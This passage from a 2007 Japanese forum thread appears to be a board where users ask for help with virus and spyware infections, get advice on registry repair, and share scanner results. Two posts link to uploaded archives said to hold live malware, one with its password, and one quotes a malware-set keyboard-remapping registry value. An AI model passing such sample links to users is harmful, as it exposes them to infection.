Fujacks系に感染と思われるので、リカバリしてください。

846 :名無しさん@お腹いっぱい。:2007/02/09(金) 00:36:15
ググってみたらなんか凶悪だなそれ。まじですか。でも
Fujacksとctfmon.exeは関連なさそうなきがするんだけど。。。

847 : ◆N9P3SuvBPo :2007/02/09(金) 00:58:11
>846
autorun.infやスキャンできないためとかいう症状でFujacksだと思っていた。
早とちりスマソ
ググってみたらシマンテックのサイトに情報があった。

W32.Fakerecy
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-w32.fakerecy.html

848 :名無しさん@お腹いっぱい。:2007/02/09(金) 07:11:01
>>846
なんかこれっぽい
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FVB%2EBDN
Fujacksの手法をパクってる 

849 :名無しさん@お腹いっぱい。:2007/02/09(金) 07:45:52
XPのmsconfigでスタートアップを見ると
wuauclt.exeという項目があります。
これ自体はwindows update関連でおかしくはないのですが
コマンドのところが"C:PROGRA~1\COMMON~1\УSTEM~1\wauclt.exe~-vt ndrv
となっています。普通キリル文字のУなんて使うでしょうか?

850 :849:2007/02/09(金) 07:48:01
最後の~は"でした。

851 :849:2007/02/09(金) 07:52:55
あーすいません。wuacltでした。つかこれ検索したらウィルスぽい。
どうも失礼しました。

852 :名無しさん@お腹いっぱい。:2007/02/09(金) 14:01:20
スパイウェアが侵入して既存のファイアーウォールにバックドアを作った場合、
スパイウェアを駆除することでバックドアはふさがれるんですか?
それともそのままなんですか?
教えてください

853 :809:2007/02/09(金) 18:40:16
>>839
いえ、.exeは3つです。

C:\WINDOWS\system32\conime.exe
C:\WINDOWS\ServicePackFiles\i386\conime.exe
C:\WINDOWS\$NtServicePackUninstall$\conime.exe

どれも正しそうに見える(64kはこの中に無い)のでどうにも・・・。
その都度名前を変えるウィルスでも存在するのでしょうか?

854 :名無しさん@お腹いっぱい。:2007/02/09(金) 18:47:26
じつは感染してないに一票

855 :名無しさん@お腹いっぱい。:2007/02/09(金) 18:49:54
2スレ前ぐらいのネタひっぱるなあ
もうちょっと独自のネタもってこいや

856 : ◆N9P3SuvBPo :2007/02/09(金) 18:55:23
>853
あなたの思い過ごしだと思いますよ。
なんなら、その3つのファイルのプロパティ(ファイルを右クリック→プロパティ)画面を
開いて、「著作権」や「会社名」を確認してください。

それでも気になるなら、カスペルスキーのオンラインスキャンをしてみてはどうか?

857 :名無しさん@お腹いっぱい。:2007/02/09(金) 18:59:14
>>853
>その都度名前を変えるウィルスでも存在するのでしょうか?
存在するよ。

隠しファイルも探してみた?
もし見つかったらうpよろしく

858 :809:2007/02/09(金) 19:05:45
最近、PCの調子悪かったので感染を疑ってたんですが・・・。症状としては先月までで今月に入ってからは
あまり無いのですが、スモールに似た挙動を示してて、プロセスのCPU占有率が100パーセントになって
アプリケーションが反応しなくなった(スモールと違ってプロセスの終了はしない)ことが多いです。
その症状が見られなくなってからはログオン時に黒い画面(ドス?)が開いてシステムイメージが展開されました。
あまりにおかしいと感じたので今はレジストリを安全に操作できるソフトでその挙動は抑えてあります。

>>854-856
ご意見ありがとうございます。カペルスキーでは検出されてません。
i386のサービスパックで気になる点はプロパティで見る作成の日付が更新の日付より後になってるファイルが
いくつもあるのです。こういうファイルでタイムスタンプがおかしな事ってザラなんですか?

859 :名無しさん@お腹いっぱい。:2007/02/09(金) 19:14:53
>>858
作成日→インスコ日

860 :809:2007/02/09(金) 19:28:33
スレの趣旨に合わないことを聞くようで悪いのですが、では更新の日付は何を指してるのですか?

861 :名無しさん@お腹いっぱい。:2007/02/09(金) 20:11:09
上書き

862 :名無しさん@お腹いっぱい。:2007/02/09(金) 20:12:22
>>860
スレの趣旨に合わないからこっちできくといいよ
http://pc10.2ch.net/test/read.cgi/win/1170227008/

863 :809:2007/02/09(金) 20:24:28
上書きの日付の方が古いってやっぱりおかしくないですか?

864 :名無しさん@お腹いっぱい。:2007/02/09(金) 20:29:25
>>863
試してみれば、即解決

865 :名無しさん@お腹いっぱい。:2007/02/09(金) 22:33:17
W32.FUJACKSに感染した.HTMファイルはマカフィーじゃないと検出できないのである

Antivirus Version Update Result
AntiVir 7.3.1.34 02.06.2007 no virus found
Authentium 4.93.8 02.06.2007 no virus found
Avast 4.7.936.0 02.05.2007 no virus found
AVG 386 02.05.2007 no virus found
BitDefender 7.2 02.05.2007 no virus found
CAT-QuickHeal 9.00 02.05.2007 no virus found
ClamAV devel-20060426 02.05.2007 no virus found
DrWeb 4.33 02.05.2007 no virus found
eSafe 7.0.14.0 02.05.2007 no virus found
eTrust-InoculateIT 30.4.3371 02.05.2007 no virus found
eTrust-Vet 30.4.3371 02.05.2007 no virus found
Ewido 4.0 02.05.2007 no virus found
Fortinet 2.85.0.0 02.06.2007 no virus found
F-Prot 4.2.1.29 02.05.2007 no virus found
Ikarus T3.1.0.31 02.06.2007 no virus found
Kaspersky 4.0.2.24 02.06.2007 no virus found
McAfee 4956 02.05.2007 W32/Fujacks!htm
Microsoft 1.2101 02.06.2007 no virus found
NOD32v2 2039 02.06.2007 no virus found
Norman 5.80.02 02.05.2007 no virus found
Panda 9.0.0.4 02.06.2007 no virus found
Prevx1 V2 02.06.2007 no virus found
Sophos 4.13.0 02.05.2007 no virus found
Sunbelt 2.2.907.0 02.02.2007 no virus found
Symantec 10 02.06.2007 no virus found
TheHacker 6.1.6.052 02.05.2007 no virus found
UNA 1.83 02.05.2007 no virus found
VBA32 3.11.2 02.05.2007 no virus found
VirusBuster 4.3.19:9 02.05.2007 no virus found

866 :名無しさん@お腹いっぱい。:2007/02/09(金) 22:59:11
【RSA Conference 2007】「プロセス・マネージャを使っても無駄」,高度化するマルウエア事情
http://itpro.nikkeibp.co.jp/article/NEWS/20070209/261562/

Windowsを狙うマルウエアは進化が著しく,マシンがマルウエアに感染しているかどうか見極めるのすら難しくなっている−−。
フィンランドF- SecureのAntti Tikkanen氏が開催中の「RSA Conference 2007」で,マルウエアを見つけ出す手法に関する講演を行い,最新のマルウエア事情を語った。

「レジストリ・エディタもプロセス・マネージャも,みんなWindowsのAPI(アプリケーション・プログラミング・インターフェース)を使って情報を入手しているが,
APIが返す情報は改ざん可能であり,信用してはならない」(Tikkanen氏)。
レジストリ・エディタを見て,自動起動させるプロセスに名前が連なっていなくても,自動起動してしまうプロセスはいくらでもある,とTikkanen氏は語る
Tikkanen氏は,「多くのマルウエアは,プロセスを探そうという動きを妨害する機能を備えている」と語り,
実際に仮想マシン上でマルウエアを実行して,マルウエアのプロセスがプロセス・マネージャに表示されないことをデモしてみせた。


Haxdoor
http://www.f-secure.co.jp/v-descs/v-descs3/haxdoor.htm


867 :名無しさん@お腹いっぱい。:2007/02/09(金) 23:20:31
X-CleanerやったらCdmというのが出ました
これなんですか?

868 :名無しさん@お腹いっぱい。:2007/02/09(金) 23:39:29
>>867
ttp://72.14.235.104/search?q=cache:MbV8IhWJElMJ:www.shareedge.com/spywareguide/product_show.php%3Fid%3D2113+X-Cleaner+Cdm&hl=ja&ct=clnk&cd=1&ie=UTF-8&inlang=ja
【アドウェア】
別名:
CDM.Novo
検出報告数:
29,980 回 / 最終報告日時: 2007/02/05 07:38:23
オフィシャル説明:
コンテンツ配布モジュール

広告をポップアップやポップアンダで表示します。

キーワード検索や訪問したWebサイトを記録します。
Internet Explorerが起動されると、設定ファイルがダウンロードされ、ログファイルの内容がwww.targetnetworks.netに送信されます。
?
?
プロパティ:
?WebページのURLを記録
?ブラウザの変更
?インターネットへの接続
?キーストロークを記録
?広告表示
除去ツール:
このスパイウェアは、X-Cleanerデラックス版で除去が可能です。

869 :名無しさん@お腹いっぱい。:2007/02/10(土) 00:34:09
ここ見てて思ったんだが今だにXPのSP1でファイアウォ−ル全切りでバスターも
ノートン先生も無くMicrosoftUpdateもしてないのにP2P使ってる私はアホってことだな。

870 :名無しさん@お腹いっぱい。:2007/02/10(土) 00:41:00
いいんじゃね
ウイルス自動アップデート機能でいつもウイルス最新版つかえて

871 :名無しさん@お腹いっぱい。:2007/02/10(土) 00:42:07
>>869
あほじゃないよ
ウィルスを楽しんでるんだなと思うだけ
ぎゃーぎゃー騒ぐやつよりいい

872 :869:2007/02/10(土) 00:55:22
月に一回はgoggleみたいなのにひっかかるけどな。
手動でウイルスからアドウェアまで消していくのは楽しいぜ。

873 :名無しさん@お腹いっぱい。:2007/02/10(土) 01:00:07
>>872
あぁ、何となく解かるなぁ
未知のウィルス踏んだ時、必死になって
虱潰しして「おk!」って後で
アンチウィルスメーカーサイトで同様の消し方見たら
「勝った!w」とか思うもんなぁ

874 :名無しさん@お腹いっぱい。:2007/02/10(土) 07:41:55
>>635
>>787
※ウイルス注意!!!!※

二週間ほどの内に、七連続でNOD32などが検出できないウイルス出現しました。
でもフリー製品などで検出できている製品はありますから、心配な人はそれらを一時的に使うと良いかもです。


AntiVir検出名:DR/Shelled.Gen
http://vista.crap.jp/img/vi7105970830.jpg
http://www.virustotal.com/

875 :名無しさん@お腹いっぱい。:2007/02/10(土) 13:24:08
・HKEY_CLASSES_ROOT\exefile\shell\open\command
キーの (既定) の値の内容が編集できません 書き込み中にエラーが発生しました というメッセージがでるのですがなぜですかね?
ちなみに値はC:\WINDOWS\support.exeになっててexeファイルがひらけません

876 :844:2007/02/10(土) 15:29:08
やっぱりW32.Fakerecyでした。
手動でやった対処でよかったみたい。


877 :名無しさん@お腹いっぱい。:2007/02/10(土) 19:12:53
>>875
シェル連動系に.exeの関連付けが書き換えられてんでしょ
support.exe消してレジの値を"%1" %*に戻して糸冬了

>>876
VB復活したの?
コンセプトウイルスっぽいね

878 :名無しさん@お腹いっぱい。:2007/02/10(土) 19:23:22
MicroWorld社のeScanしたら6時間かかったんだけど、こんなもんなの?

879 :875:2007/02/10(土) 19:29:56
support.exeも消したんですが、レジストリエディタで値を"%1" %*にかきかえようとするとエラーメッセージが出るんです



880 :名無しさん@お腹いっぱい。:2007/02/10(土) 19:42:11
>>875
ねえ .exeの関連付けかえられてるのによくレジストリエディタ起動できたね
どうやったの?

881 :875:2007/02/10(土) 20:00:52
>>880
regedit.exeをregedit.comにリネームして
ファイル名を指定して実行 からひらきました

882 :名無しさん@お腹いっぱい。:2007/02/10(土) 20:04:48
>>881
すごい foo氏みたいw
俺よりスキルあるみたいだからこれ以上アドバイスはできない ごめんね

883 :875:2007/02/10(土) 20:06:43
すいません foo氏のドクロ画面がでたときの対処法みてやりました


884 :名無しさん@お腹いっぱい。:2007/02/10(土) 20:25:49
レジストリエディタ自体がやられてるんだったら
フリーのレジストリエディタつかってみれば?
http://www.altech-ads.com/product/10000445.htm

すすめといてなんなんだけど 俺まだこれ使ったことないんだw
けどIT Proで推奨されてたからいいんジャマイカ

「攻撃者の“足跡”を探せ」---Windowsレジストリの解析方法
http://itpro.nikkeibp.co.jp/article/COLUMN/20061122/254671/


885 :名無しさん@お腹いっぱい。:2007/02/10(土) 20:29:44
>>883
Administrators権限でやってる?
commandの上で右クリでアクセス許可出して、画像キャプってうpよろ。


886 : ◆N9P3SuvBPo :2007/02/10(土) 21:16:49
>883
・HKEY_CLASSES_ROOT\exefile\shell\open\commandの
アクセス権を変えても無理ですか?

レジストリのアクセス権の変更
ttp://wiki.higaitaisaku.com/wiki.cgi?page=%A5%EC%A5%B8%A5%B9%A5%C8%A5%EA%A4%CE%A5%A2%A5%AF%A5%BB%A5%B9%B8%A2%A4%CE%CA%D1%B9%B9%CA%FD%CB%A1

887 :875:2007/02/10(土) 21:50:41
http://up2.viploader.net/pic/src/viploader412953.jpg.html
とりあえずうpしました よろしくおねがいします

888 :名無しさん@お腹いっぱい。:2007/02/10(土) 22:07:26
>>887
アダ被で質問してる(?)

889 :875:2007/02/10(土) 22:10:27
いえ してないです


890 :名無しさん@お腹いっぱい。:2007/02/10(土) 22:14:26
>>889
かなり似た質問があるw
http://bbs.higaitaisaku.com/cbbs.cgi?mode=one&number=89015&type=0&space=0&no=0


891 :名無しさん@お腹いっぱい。:2007/02/10(土) 23:20:13
>>875
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout に
Scancode Map" /t REG_BINARY /d 00000000000000000200000053E0000000000000 /f
みたいな記述がない?あったらScancode Map以下を削除
keyを入れ替えられて正しくうてなくなってる可能性がある

新ドクロ?『乗っ取りドクロウイルス』
http://blog.livedoor.jp/hpg/archives/50125241.html

892 :名無しさん@お腹いっぱい。:2007/02/10(土) 23:23:39
>>891
fooさんすご

893 :名無しさん@お腹いっぱい。:2007/02/10(土) 23:43:00
かつ兄氏より引用

レジストリエディタでの関連付けの修復はあきらめて
http://homepage2.nifty.com/winfaq/wxp/trouble.html#1251
の方法を利用して関連付けを修復してください。

あるいは、
シマンテックのリセットツールを入手し、実行してみる。
http://www.symantec.com/region/jp/sarcj/data/t/tool.to.reset.shellopencommand.registry.keys.html

以外に、セーフモードで起動するとき、
Administratorでログインして修復を試すという方法があります。


894 :名無しさん@お腹いっぱい。:2007/02/11(日) 00:07:49
>>893
そこはまれに見る親切な板だといつも思う

895 :名無しさん@お腹いっぱい。:2007/02/11(日) 00:07:54
検体もってたんでvtでスキャンしてみた
まっかっかだなおいw 
http://www.virustotal.com/vt/en/resultadof?30e9a7601d9e6f2481a84e7a83b4fe4d

だけど詳細でてるとこないっぽいんだよなあ
ひまだったら明日踏んでみるか…

896 :875:2007/02/11(日) 00:35:35
試してなかったのですがセーフモードで起動するとき、
Administratorでログインして修復をしてみたらレジストリエディタで修復できました

アドバイスしてくれたみなさんほんとうにありがとうございました

897 :名無しさん@お腹いっぱい。:2007/02/11(日) 00:41:32
>>896

寝よ

898 :名無しさん@お腹いっぱい。:2007/02/11(日) 09:46:51
拡張子AVIのファイルを落としたんだけど、
右クリックしても、ウィルス検索・削除・プロパティなどの行が表示されません。
大きさは600MBくらいです。
間違ってクリックしたけど、何も起動しませんでした。
OSはXPです。

これはウィルスだったのでしょうか?
その後、オンラインスキャンでHITはしませんでしたが気になります。
ウィルスでないならスルーしてください。。

899 :名無しさん@お腹いっぱい。:2007/02/11(日) 17:17:36
まもなく期限切れるNISをアンインストールしようとしたら失敗するってんで
スマンテックのNIS削除ツールを使おうとしたら
鯖落ちてる(?)のか、DLできず、NISをアンインストールできないんだけど
どうすりゃいいかわかりません?

このままじゃ、NISを駆除できないせいで乗り換えができないがな…

900 :名無しさん@お腹いっぱい。:2007/02/11(日) 17:22:50
>>899
削除ツールもゴミが残るんで、手動で削除したほうがいいよ

901 :名無しさん@お腹いっぱい。:2007/02/11(日) 17:53:59
>>900
ども。

俺は、2kなもんで、アンインストールしたあと、削除ツール使おうとしたんです。
んでもコンパネからアプリの削除を手動で開始すると
NISのアンインスコ始めて数秒でエラー起こして、
エラーログとってますとかいうのが10分ぐらいでて、
ようやく終わったかと思うと、NIS野郎が全部ピンピンしてるんです。
そりゃもうデスクトップにショートカットまで作ってくれるくらい。

1.手動だめ、
2.スマンテックは鯖落ち(?)で(Norton Removal toolもSymUninstも)手に入らない
ってとこなんです。


902 :899=901:2007/02/11(日) 18:06:19
あ、ちなみに、コントロールパネル経由ではなくCDからの削除もだめです。
まあ、やってることは同じでしょうから当然なんでしょうけど。

903 :名無しさん@お腹いっぱい。:2007/02/11(日) 18:29:29
http://pc10.2ch.net/test/read.cgi/sec/1170302366/l6


904 :名無しさん@お腹いっぱい。:2007/02/12(月) 21:09:14
宛名職人が勝手にインスコされるウィルスなんてあるのだろうか…?
なんか気味が悪いぜ

905 :名無しさん@お腹いっぱい。:2007/02/12(月) 21:22:42
>>904
あぁ、あるある 何かに入ってたぞ
とりあえず、ウィルスじゃないけど

906 :名無しさん@お腹いっぱい。:2007/02/12(月) 22:40:09
今日のNHKニュースのMSオフィスの欠陥って、煽りじゃねえ?
別にニュースにするほどでもない、NHKともあろうものが世間さまを騒がすんじゃねえよ
http://www3.nhk.or.jp/news/2007/02/12/d20070212000104.html

907 :名無しさん@お腹いっぱい。:2007/02/12(月) 22:52:56
Zero-Day Trackerなんか見てるとofficeは使う気にならんな('A`) 
http://research.eeye.com/html/alerts/zeroday/

908 :名無しさん@お腹いっぱい。:2007/02/13(火) 00:42:20
でも、IME単体で販売してないしなぁ……。

909 :名無しさん@お腹いっぱい。:2007/02/13(火) 01:28:57
>>907
あった!アリガトウ!

910 :名無しさん@お腹いっぱい。:2007/02/13(火) 18:56:31
ボット対策サイト「サイバークリーンセンター」の駆除ツールにセキュリティホール
http://itpro.nikkeibp.co.jp/article/NEWS/20070213/261772/

セキュリティ組織のJPCERTコーディネーションセンター(JPCERT/CC)は2007年2月9日、ボット対策用ポータルサイト「サイバークリーンセンター」が配布していたボット検出・駆除ツール
「CCCクリーナー」にセキュリティホール(ぜい弱性)が見つかったことを明らかにした
細工が施されたファイルの検査を実行すると、ファイルに仕込まれた悪質なプログラムを実行されたり、Windowsが不正終了したりする恐れがある。
(>>23参照)

セキュリティホールが見つかったのは、2007年1月25日から2月9日までサイバークリーンセンターで配布していたCCCクリーナー。
CCCクリーナーには、トレンドマイクロのウイルス検索エンジンを使用している。同社のウイルス検索エンジンには2月7日、「バッファオーバーフロー」と呼ばれるセキュリティホールが見つかった
そして今回、1月25日から2月9日に配布されたCCCクリーナーも、このセキュリティホールの影響を受けることが確認された。

この間にツールをダウンロードおよび実行したユーザーは、ツールの使用を中止し、ダウンロードしたツールや、ツールが作成したフォルダなどを削除する必要がある。
2月9日19時 32分以降に配布されているCCCクリーナー(バージョン253以降)では、セキュリティホールは解消されている。

バージョンの確認方法や、ツールの削除方法については、JPCERT/CCが公表している資料(PDFファイル)に詳しい。
CCCクリーナーを使った覚えがあるユーザーは、この資料を参照して対策を実施する必要がある

911 : ◆N9P3SuvBPo :2007/02/13(火) 19:52:51
>910
おいおい…w
BOT系ウイルスに感染しているかを調べるには
ツールに頼らずに、手動によるレジストリ解析、ファイルの検索などで見つけるしか無いな。
で、確実に感染していることがわかれば、リカバリだね。

でも初心者の人には酷な作業になるから、やはりツールに頼らざるを得ないのが現状か?

912 :名無しさん@お腹いっぱい。:2007/02/13(火) 20:06:50
>>911
ispを通じてbot感染の連絡をうけてサイバークリーンセンターのツールを実行してそのままの人もいるかもしれないし
まあ一応念のため貼っときました


ところで今日のit mediaのニュースはすごいですね

「お祈りパンダ」のブリーダー、中国で逮捕
http://www.itmedia.co.jp/news/articles/0702/13/news027.html

Wordのゼロデイ脆弱性でまた新手の攻撃
http://www.itmedia.co.jp/news/articles/0702/10/news017.html

マルウェア抗争の再来? ボットネットがWarezov陣営を攻撃
http://www.itmedia.co.jp/news/articles/0702/10/news016.html

MSNワームの新種がアジアで発生
http://www.itmedia.co.jp/news/articles/0702/10/news008.html

携帯マルウェアが増加傾向、8割が感染を経験――McAfee調査
http://www.itmedia.co.jp/news/articles/0702/13/news041.html


913 :名無しさん@お腹いっぱい。:2007/02/13(火) 20:55:29
>>910
>>912
さんくす

914 : ◆N9P3SuvBPo :2007/02/13(火) 21:11:01
>912
なるほど、そういうことなら納得です。

しかしすごいねw>ITメディアのニュース

915 :名無しさん@お腹いっぱい。:2007/02/13(火) 21:28:23
>>914
fujacksの作者が逮捕されたってのは大きいですね
WhBoyってニックネームだったんだw
fujacksはbotなどとは違ってスクリプトキディが自身のスキルを誇示する目的でつくられたような気がします
でなきゃパンダのアイコンなんかつかいませんよねw

マルウエア作者の逮捕って久しぶりに聞いた気がするんですけど
やはり情報統制されている中国ならではなのでしょうか
日本では聞いたことがありませんね

916 :名無しさん@お腹いっぱい。:2007/02/13(火) 22:14:02
>>915
日本は中国と異なり完全な統制社会だからね。
跳ね上がり者が表に出ることさえない。

917 :名無しさん@お腹いっぱい。:2007/02/14(水) 17:07:47
静かな

918 :質問:2007/02/15(木) 07:15:21
【使用OS】 windows XP
【MicrosoftUpdate】 しました。
【使用セキュリティソフト】 @nifty 常時安全セキュリティ
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】 なし
【スキャンの結果何が検出されたか JAVA_BYTEVER.AY
【どんな症状が出るか】 とくにないですが、起動してすぐにマウスが反応しません。
【症状が出る前に何をやったか】 海外のインテリアサイトみました。
【症状を解決しようとどのような処置を取ったか】 スキャンして、駆除しようとして、「駆除不可能「アクセス付加」となり駆除できません。
エクスプローラーから検索しても、出てきません。
c:\\Documents and Settings\Owner\Application Data\Sun\Java\DEployment\cache\Javapi\v1.0\jar
crtdcghcn.jar-49a4f090-2c76cc9d.zip
というところがJAVA_BYTEVER.AYに感染してます。

エクスプローラーで検索してもこのファイルは出てきません。
でも、ウィルス検査すると出てきます。
削除しようがありません。
他スレで質問したらセーフモードで起動して削除と教えていただきましたが
できませんでした。
パッチも当てると教えていただいたのですが、更新と一致してませんとなり
つかえませんでした。

どうしたら削除できますか?

919 :名無しさん@お腹いっぱい。:2007/02/15(木) 12:48:25
>>917
湖畔の

920 :名無しさん@お腹いっぱい。:2007/02/15(木) 13:15:38
>>918
「常時安全セキュリティ24」 @nifty
ttp://www.nifty.com/sec24/aftercare.htm

Norton Internet Securityのパッケージ版のがトラブルは少ないと思う

921 :名無しさん@お腹いっぱい。:2007/02/15(木) 16:55:58
>>918
それってzip解凍したら出てくるんでないの?

922 :名無しさん@お腹いっぱい。:2007/02/15(木) 17:37:34
>>918
あんた>>693だろ

923 :名無しさん@お腹いっぱい。:2007/02/15(木) 17:52:06
918さん 私は違います。おかげさまで駆除できそうです。ありがとうございました

924 :名無しさん@お腹いっぱい。:2007/02/15(木) 18:10:52
http://pc9.2ch.net/test/read.cgi/jisaku/1171035125/937
↑のzipのやつ、ウィルス入りだと思うんだがバスター2006だと
検出できない。おまいら検出できる?

925 :名無しさん@お腹いっぱい。:2007/02/15(木) 18:41:06
>>924
カスペその他対応済み

926 :名無しさん@お腹いっぱい。:2007/02/15(木) 18:46:42
>>924
ひとつだけ落として解凍したら
[反対幼児]ひみつのEnsenble\img_01_0.jpg.exe' [HEUR-DBLEXT/Crypted].
by avira antivirus

927 :名無しさん@お腹いっぱい。:2007/02/15(木) 18:47:04
>>925
バスター、駄目なのか・・・orz

928 :名無しさん@お腹いっぱい。:2007/02/15(木) 18:51:25
>>919
森の

929 :名無しさん@お腹いっぱい。:2007/02/15(木) 18:56:51
>>926
We found a new virus in the attachment you have sent us.
The pattern recognition will be integrated in one of our next updates.
The virus will be detected as TR/Spy.Banker.cjo

by avira

930 :名無しさん@お腹いっぱい。:2007/02/15(木) 19:45:25
>>928
いかがと

931 :名無しさん@お腹いっぱい。:2007/02/15(木) 20:10:41
>>929
対応、超っぱやですね。THXです。

932 :名無しさん@お腹いっぱい。:2007/02/15(木) 20:24:45
>>930
っ http://www.hi-ho.ne.jp/momose/mu_title/shizukana_kohande.htm

933 :名無しさん@お腹いっぱい。:2007/02/15(木) 21:55:17
(((((((((((((((((((((((((((((((((((((((((((((((((((((

934 :名無しさん@お腹いっぱい。:2007/02/16(金) 17:08:27
windowsフォルダに削除しても再起動すると復活してるexeと
Tempフォルダにmaindll.dllってのが作られるんだけどもう放置しといていいのかな
ちょうど去年の12月31日で更新きれたノートンが反応するけど

935 :名無しさん@お腹いっぱい。:2007/02/16(金) 17:49:41
>>934
コピーして検体送付

936 :名無しさん@お腹いっぱい。:2007/02/16(金) 20:35:37
XPSP2 NIS2007 ルータ有 update通知後即実行
スレ違いでしたら申し訳ないのですが、
いつの間にかC:\TempEI4というフォルダがあり
その中にいくつかLOGファイルがあるのですが、これはなにかウイルス等と関係しているのでしょうか?
ググってはみたんですがこれ自体がウイルスに関係しているのかわからず…orz

937 :名無しさん@お腹いっぱい。:2007/02/16(金) 21:37:47
■ウイルス警報■

また短期間の内に、約十連続でNOD32などが検出できないウイルスが出ました。
ただ今回は多数のフリー製品やKaspersky系の他に、ウイルスバスターなどの超メジャーな製品は対応できています。
NOD32などを使われている方は、検出できないウイルスが短期間で多く発見されているので、
製品の性能を過信せずにご注意して下さい。

ウイルスバスター検出名:novirus:Packed/NSPM
http://vista.jeez.jp/img/vi7154559065.jpg
http://www.virustotal.com/


参考)
>NOD32アンチウィルス Part42
>
>539 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/02/13(火) 18:32:43
>カスペとウイルスバスターのオンラインスキャンで、それぞれBackdoor.Win32.Agent.agv、
>BKDR_GENERICと判定された2つのファイルにNOD32が無反応なんですが、どこに報告
>すれば良いですか?

参考)
>566 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/02/15(木) 09:56:34
>F-Secure 6.70.13030.0 02.14.2007 Trojan-Proxy.Win32.Delf.ce
>Ikarus T3.1.0.31 02.14.2007 Email-Worm.Win32.Bagle.BR
>Kaspersky 4.0.2.24 02.15.2007 Trojan-Proxy.Win32.Delf.ce
>
>ttp://www.virustotal.com/vt/en/resultadof?ecc88a81e16a9d6f739b4f4eb430b04c
>
>567 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/02/15(木) 10:00:07
>またNODはヌルーですか

938 :934:2007/02/16(金) 22:19:38
問題が発生したため、explorer.exeを終了します。ってエラーのウィンドウが出てきて
エラーを送信しないをクリックして閉じた後に決まってノートンがbackdoor trojanを検出するんだけど
このエラーウィンドウを閉じなければ何も起こらないぽいから放置しててもいい?
常に最前面に出てるけど端っこに移動させてれば気にならないし     いや気になるけど

939 :名無しさん@お腹いっぱい。:2007/02/16(金) 22:45:45
> 問題が発生したため、explorer.exeを終了します
このダイアログってめったに見ないけどなあ
windowsに復活する.exeが.dll復活させてるようなキモス
maindll.dllは↓みたいだけど
http://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FAGENT%2EGVV&VSect=Td

レジの自動起動エントリチェックするとかカスペでスキャンするとかhijackthisつかうとかすればなんかわかる鴨
http://www.geocities.jp/bruce_teller/security/leakytrojan.htm

940 :名無しさん@お腹いっぱい。:2007/02/16(金) 23:13:29
>>939
見てみたけどまったく意味がわかりません><

941 :名無しさん@お腹いっぱい。:2007/02/16(金) 23:39:56
>>940
スタートアップ手法のリストはがんばって読んでみて
ここを書き換えられた場合にマルウェアが自動起動するようになる

942 :名無しさん@お腹いっぱい。:2007/02/16(金) 23:40:46
画面外にギリギリまで押し出してるからこんな感じ
隙あらばって感じ 常にこっち見てる

       {    !      _,, -ェェュ、   |
ィ彡三ミヽ  `ヽ     ,ィハミミミミミミミミミヽ、|
彡'⌒ヾミヽ   `ー  /ililハilミilミliliミliliミミヾ|
     ヾ、        /iiiiイ!ヾヾミ、ミニ=ー-ミii|
  _    `ー―' i!ハ:.:.\\_::::::::::::::/:.|
彡三ミミヽ        i! ヽ:.:.:.:冫': : :::/,,∠|
彡'   ヾ、    _ノ i!::: ̄二ー:: : ::::ソ ・ ,|
      `ー '    {ヘラ' ・_>シ;テツ"''''"|
 ,ィ彡三ニミヽ  __ノ ヽヘ`" 彡' 〈     |
彡'      ` ̄       `\   ー-=ェっ |
      _  __ ノ  {ミ;ヽ、   ⌒   |
   ,ィ彡'   ̄        ヾミミミミト-- '  |
ミ三彡'        /⌒ / ̄ ̄ | : ::::::::::|
       ィニニ=- '     / i   `ー-(二つ
     ,ィ彡'         { ミi      (二⊃
   //        /  l ミii       ト、二)
 彡'       __,ノ   | ミソ     :..`ト-'
        /          | ミ{     :.:.:..:|
            ノ / ヾ\i、   :.:.:.:.:|
      ィニ=-- '"  /  ヾヾiiヽ、 :.:.:.:.::::|
    /     /  `/ ̄ ̄7ハヾヾ : .:.:.|
   ノ     _/   /   /  |:. :.:.:.:.:.:.:|

943 : ◆N9P3SuvBPo :2007/02/16(金) 23:50:02
>1テンプレ修正版

【使用OS】 「」
【Microsoft Updateの状態】 「」 
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」 
【スパイウェア対策ソフト】 「」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」

【どんな症状が出るか】 「」
【症状が出る前に何をやったか】 「」
【症状を解決しようとどのような処置を取ったか】 「」
【その他の質問】 「」

とりあえずこんなもので
っていうか、質問者は大変だろうな。

944 :名無しさん@お腹いっぱい。:2007/02/17(土) 00:15:02
>>943
乙です
ちょっと項目が多い気もしますが次スレで実験的に使ってみるのはいいと思います
そろそろ花粉と新種の季節ですねw

945 :名無しさん@お腹いっぱい。:2007/02/17(土) 00:29:23
>>942
ワロタ
>>943
乙です

946 : ◆N9P3SuvBPo :2007/02/17(土) 00:32:36
>944
そうですね。
自分でも多い気がしますが、これなら回答者が質問者に対して
的確なアドバイスをしやすくなると思いますので、これ位は必要かと思いました。

と言うことで、自作自演でもしてみます。
>>943
大杉w
5つに搾れw
【OS】
【対策ソフト】
【Update】
【スキャンした結果】
【症状】


947 :名無しさん@お腹いっぱい。:2007/02/18(日) 00:49:06
http://www8.axfc.net/uploader/15/so/N15_17125.zip.html

PASS news
このファイルの画像01が偽装jpgでexeになっています。
これは何のウィルスでしょうか……? 踏んでしまったのですが……

948 :名無しさん@お腹いっぱい。:2007/02/18(日) 00:54:22
失礼しました、テンプレに従います

【OS】 XP home edition
【対策ソフト】 ノートン アンチウィルス06
【Update】ちょっとわかりません、すいません
【スキャンした結果】検出されませんでした
【症状】特になし、ただwindowsタスクマネージャのプロセスに01.jpg.exeが大量発生。削除して再起動しても再び発生

949 :名無しさん@お腹いっぱい。:2007/02/18(日) 00:58:26
Win32.Delf.ce

950 :名無しさん@お腹いっぱい。:2007/02/18(日) 01:11:17
>>947
Antinny危険

951 :947:2007/02/18(日) 01:16:10
当方P2Pの類には手を出していないのですが、何か具体的な被害は出ているのでしょうか……?


952 :名無しさん@お腹いっぱい。:2007/02/18(日) 01:21:43
じゃあそのままにしとけば?

